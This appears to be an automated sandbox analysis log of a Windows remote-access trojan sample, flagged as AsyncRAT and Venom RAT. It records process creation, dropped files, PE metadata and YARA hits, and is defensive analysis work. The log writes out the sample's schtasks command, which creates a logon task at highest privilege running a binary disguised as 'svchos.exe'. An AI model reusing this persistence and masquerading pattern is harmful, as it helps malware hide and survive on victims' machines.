Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7424
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe File created: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD46E.tmp.bat""
Source: rU6YAgkoAw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rU6YAgkoAw.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: rU6YAgkoAw.exe ReversingLabs: Detection: 28%
Source: rU6YAgkoAw.exe Virustotal: Detection: 40%
Source: unknown Process created: C:\Users\user\Desktop\rU6YAgkoAw.exe "C:\Users\user\Desktop\rU6YAgkoAw.exe"
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process created: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe "C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\svchost (3).exe "C:\Users\user~1\AppData\Local\Temp\svchost (3).exe"
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user~1\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 1184
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\start.exe "C:\Users\user~1\AppData\Local\Temp\start.exe"
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD46E.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchos.exe C:\Users\user\AppData\Roaming\svchos.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\svchos.exe "C:\Users\user\AppData\Roaming\svchos.exe"
Source: C:\Users\user\AppData\Local\Temp\build.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\main" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\main" --mojo-platform-channel-handle=2148 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process created: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe "C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\svchost (3).exe "C:\Users\user~1\AppData\Local\Temp\svchost (3).exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user~1\AppData\Local\Temp\build.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\start.exe "C:\Users\user~1\AppData\Local\Temp\start.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD46E.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\svchos.exe "C:\Users\user\AppData\Roaming\svchos.exe"
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\main" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\main" --mojo-platform-channel-handle=2148 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: rU6YAgkoAw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rU6YAgkoAw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Accessibility.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: App3FAAL98.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.pdbMZ source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Accessibility.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.pdb) source: WERBE36.tmp.dmp.22.dr
Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\App3FAAL98\obj\Release\App3FAAL98.pdb source: svchost (3).exe, 00000010.00000000.2293696073.000001C7CAF62000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: Accessibility.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.pdb` source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.pdba@( source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.pdbp source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: vk_swiftshader.dll.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: start.exe.15.dr, Packet.cs .Net Code: Plugins System.AppDomain.Load(byte[])
Source: svchos.exe.23.dr, Packet.cs .Net Code: Plugins System.AppDomain.Load(byte[])
Source: 23.2.start.exe.300be20.0.raw.unpack, Packet.cs .Net Code: Plugins System.AppDomain.Load(byte[])
Binary contains a suspicious time stamp
Source: svchost (3).exe.15.dr Static PE information: 0xC7E7BF4F [Sat Apr 11 18:02:55 2076 UTC]
PE file contains sections with non-standard names
Source: vulkan-1.dll.21.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.21.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.21.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.21.dr Static PE information: section name: .voltbl
Source: vulkan-1.dll.21.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll.21.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.21.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.21.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.21.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll.21.dr Static PE information: section name: _RDATA
Source: libEGL.dll.21.dr Static PE information: section name: .00cfg
Source: libEGL.dll.21.dr Static PE information: section name: .gxfg
Source: libEGL.dll.21.dr Static PE information: section name: .retplne
Source: libEGL.dll.21.dr Static PE information: section name: .voltbl
Source: libEGL.dll.21.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.21.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.21.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.21.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.21.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll.21.dr Static PE information: section name: _RDATA
Source: main.exe.21.dr Static PE information: section name: .00cfg
Source: main.exe.21.dr Static PE information: section name: .gxfg
Source: main.exe.21.dr Static PE information: section name: .retplne
Source: main.exe.21.dr Static PE information: section name: .rodata
Source: main.exe.21.dr Static PE information: section name: .voltbl
Source: main.exe.21.dr Static PE information: section name: CPADinfo
Source: main.exe.21.dr Static PE information: section name: LZMADEC
Source: main.exe.21.dr Static PE information: section name: _RDATA
Source: main.exe.21.dr Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.21.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.21.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.21.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.21.dr Static PE information: section name: .voltbl
Source: vk_swiftshader.dll.21.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.21.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll0.21.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.21.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.21.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll0.21.dr Static PE information: section name: _RDATA
Source: libEGL.dll0.21.dr Static PE information: section name: .00cfg
Source: libEGL.dll0.21.dr Static PE information: section name: .gxfg
Source: libEGL.dll0.21.dr Static PE information: section name: .retplne
Source: libEGL.dll0.21.dr Static PE information: section name: .voltbl
Source: libEGL.dll0.21.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll0.21.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll0.21.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll0.21.dr Static PE information: section name: .retplne
Source: libGLESv2.dll0.21.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll0.21.dr Static PE information: section name: _RDATA
Source: main.exe0.21.dr Static PE information: section name: .00cfg
Source: main.exe0.21.dr Static PE information: section name: .gxfg
Source: main.exe0.21.dr Static PE information: section name: .retplne
Source: main.exe0.21.dr Static PE information: section name: .rodata
Source: main.exe0.21.dr Static PE information: section name: .voltbl
Source: main.exe0.21.dr Static PE information: section name: CPADinfo
Source: main.exe0.21.dr Static PE information: section name: LZMADEC
Source: main.exe0.21.dr Static PE information: section name: _RDATA
Source: main.exe0.21.dr Static PE information: section name: malloc_h
Source: vk_swiftshader.dll0.21.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll0.21.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll0.21.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll0.21.dr Static PE information: section name: .voltbl
Source: vk_swiftshader.dll0.21.dr Static PE information: section name: _RDATA

Persistence and Installation Behavior
barindex
Drops executable to a common third party application directory
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\main.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe File created: C:\Users\user\AppData\Local\Temp\build.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe File created: C:\Users\user\AppData\Local\Temp\svchost (3).exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\System.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe File created: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe File created: C:\Users\user\AppData\Local\Temp\start.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\start.exe File created: C:\Users\user\AppData\Roaming\svchos.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user~1\AppData\Local\Temp\nspBED4.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\LICENSE.electron.txt Jump to behavior

Boot Survival
barindex
Yara detected AsyncRAT
Source: Yara match File source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchos.exe, type: DROPPED
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"'
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process information set: NOOPENFILEERRORBOX Jump to behavior
